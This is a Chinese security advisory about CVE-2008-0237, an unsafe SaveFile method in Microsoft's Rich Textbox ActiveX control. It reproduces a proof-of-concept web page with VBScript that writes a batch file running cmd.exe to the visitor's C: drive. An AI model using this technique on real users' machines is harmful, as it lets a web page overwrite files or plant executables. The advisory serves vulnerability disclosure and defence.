安全研究

安全漏洞
Mircrosoft 富文本框控件'richtx32.ocx' ActiveX不安全方法漏洞

发布日期:2008-01-09
更新日期:2008-02-06

受影响系统:
Microsoft Rich TextBox Control 6.0
描述:
BUGTRAQ  ID: 27201
CVE(CAN) ID: CVE-2008-0237

richtx32.ocx是微软Microsoft字符编辑器控制相关程序,用于字符对话框对象高级编辑。

Microsoft Rich Textbox ActiveX Control (RICHTX32.OCX) 6.1.97.82允许远程攻击者调用不安全SaveFile方法执行任意命令。

<*来源:shinnai (shinnai@autistici.org
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method</b> url: http://www.microsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> <b>Technical details:</b> File: RICHTX32.OCX ver.: 6.1.97.82 While this GUID <b>{3B7C8860-D78F-101B-B9B5-04021C009402}</b> is killbited, this one <b><font color='green'>{B617B991-A767-4F05-99BA-AC6FCABB102E}</font></b> works fine so it is possible, using the "SaveFile()" method, to save the content of the rich textbox on a user's pc. This can be used to save, overwrite and/or corrupt arbitrary files on the system. It's marked as: <b>RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data</b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:B617B991-A767-4F05-99BA-AC6FCABB102E' id='test' style='width: 250px; height: 75px'></object>    <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause" test.SaveFile "C:\shinnai.bat", 1 MsgBox "Exploit completed!" End Sub </script></span></span></code></pre>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://technet.microsoft.com/security/bulletin/

浏览次数:2045
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障